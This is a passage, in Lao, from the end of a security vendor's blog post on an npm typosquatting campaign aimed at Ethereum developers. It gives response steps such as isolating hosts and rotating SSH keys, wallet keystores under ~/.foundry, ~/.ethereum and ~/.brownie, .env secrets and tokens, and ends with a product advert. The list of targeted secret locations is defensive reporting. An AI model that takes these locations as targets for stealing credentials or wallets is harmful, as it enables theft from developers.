ນັ້ນລວມທັງເຄື່ອງຈັກທີ່ຕິດຕັ້ງ Foundry, ກະແຈ Alchemy ຫຼື Infura ໃນສະພາບແວດລ້ອມ, ກະແຈສ່ວນຕົວ, ລະຫັດຊ່ວຍຈຳ, ຫຼື ກະແຈຕົວນຳໃຊ້.

ຄຳຕອບທີ່ແນະນຳ:

  • ຕັດການເຊື່ອມຕໍ່ໂຮສອອກຈາກເຄືອຂ່າຍ.
  • ຮັກສາໄວ້ node_modules, ໄຟລ໌ລັອກ, ປະຫວັດຂອງເຊວ, ແລະບັນທຶກທີ່ກ່ຽວຂ້ອງສຳລັບການກວດສອບທາງດ້ານນິຕິວິທະຍາ.
  • ໝຸນຄູ່ຄີ SSH ແຕ່ລະຄູ່ພາຍໃຕ້ ~/.ssh/.
  • ໝຸນກະແຈກະເປົາເງິນສຳລັບທຸກໆບ່ອນເກັບກະແຈພາຍໃຕ້ ~/.foundry, ~/.ethereum, ແລະ ~/.brownie.
  • ຍ້າຍເງິນໄປຍັງກະເປົາເງິນໃໝ່.
  • ໝຸນທຸກຄວາມລັບທີ່ເກັບໄວ້ໃນ .env* ໄຟລ໌ໃນບ່ອນເກັບມ້ຽນທີ່ນັກພັດທະນາເຮັດວຽກຢູ່.
  • ໝຸນຄວາມລັບຂອງສະພາບແວດລ້ອມທີ່ກົງກັບ regex ຂອງຄໍເລັກຊັນ, ລວມທັງກະແຈ AWS, ໂທເຄັນ npm, ໂທເຄັນທີ່ນຳໃຊ້, ກະແຈ API, ກະແຈສ່ວນຕົວ, ແກ່ນ, ແລະ ຕົວຊ່ວຍຈຳ.
  • ກວດສອບກິດຈະກຳຂອງ cloud, npm, GitHub, ຜູ້ໃຫ້ບໍລິການ RPC, ແລະ blockchain ນັບຕັ້ງແຕ່ແພັກເກດຖືກຕິດຕັ້ງຄັ້ງທຳອິດ.
  • ປັບແຕ່ງຮູບພາບພື້ນທີ່ເຮັດວຽກຄືນໃໝ່ກ່ອນທີ່ຈະນຳໃຊ້ຄືນໃໝ່.

ສິ່ງທີ່ຜູ້ປົກປ້ອງຄວນເອົາໄປ

ແຄມເປນນີ້ສະແດງໃຫ້ເຫັນວ່າການ typosquatting npm ກຳລັງພັດທະນາແນວໃດອ້ອມຮອບລະບົບນິເວດຂອງນັກພັດທະນາທີ່ມີມູນຄ່າສູງ.

ນັກສະແດງບໍ່ຕ້ອງການຄວາມອົດທົນ. ພວກເຂົາບໍ່ຕ້ອງການການປິດບັງ. ພວກເຂົາບໍ່ຕ້ອງການແມ່ນແຕ່ການປະຕິບັດເວລາຕິດຕັ້ງ.

ແທນທີ່ຈະ, ພວກເຂົາອີງໃສ່ສາມຢ່າງຄື:

  • ຊື່ແພັກເກດ Web3 ທີ່ໜ້າເຊື່ອຖືໄດ້
  • ການເປີດໃຊ້ງານພຽງແຕ່ໃນເຄື່ອງພັດທະນາ crypto ທີ່ແທ້ຈິງເທົ່ານັ້ນ
  • ການລັກຂະໂມຍໄຟລ໌ ແລະ ຄວາມລັບໂດຍກົງທີ່ສຳຄັນທີ່ສຸດສຳລັບນັກພັດທະນາ Ethereum

ສິ່ງນັ້ນເຮັດໃຫ້ການໂຄສະນາຫາສຽງພາດໄດ້ງ່າຍໃນການສະແກນຢ່າງກວ້າງຂວາງ ແລະ ເປັນອັນຕະລາຍເມື່ອມັນຕົກຢູ່ໃນສະພາບແວດລ້ອມທີ່ເໝາະສົມ.

ສຳລັບທີມງານ Web3, ບົດຮຽນແມ່ນຈະແຈ້ງ: ປະຕິບັດຕໍ່ຊື່ການເພິ່ງພາອາໄສເປັນສ່ວນໜຶ່ງຂອງຮູບແບບໄພຂົ່ມຂູ່ຂອງທ່ານ. ແພັກເກດທີ່ເບິ່ງຄືວ່າເປັນຜູ້ຊ່ວຍທີ່ບໍ່ເປັນອັນຕະລາຍຍັງສາມາດກາຍເປັນເສັ້ນທາງທີ່ສັ້ນທີ່ສຸດໄປສູ່ການປະນີປະນອມກະເປົາເງິນໄດ້.

ລາຍງານໄປຍັງທະບຽນ npm ແລ້ວ. ພວກເຮົາຈະອັບເດດໂພສນີ້ເມື່ອບັນຊີຜູ້ເຜີຍແຜ່ ແລະ ແພັກເກດຖືກລຶບອອກ.

ເຄື່ອງມືວິເຄາະອົງປະກອບຊອບແວ SCA
ຈັດລຳດັບຄວາມສຳຄັນ, ແກ້ໄຂ ແລະ ຮັກສາຄວາມສ່ຽງດ້ານຊອບແວຂອງທ່ານໃຫ້ປອດໄພ
ຮັບບັນຊີຟຣີຂອງທ່ານ.
ບໍ່ຕ້ອງມີບັດເຄດິດ.

ຮັບປະກັນການພັດທະນາຊອບແວ ແລະ ການຈັດສົ່ງຂອງທ່ານ

ດ້ວຍຊຸດຜະລິດຕະພັນ Xygeni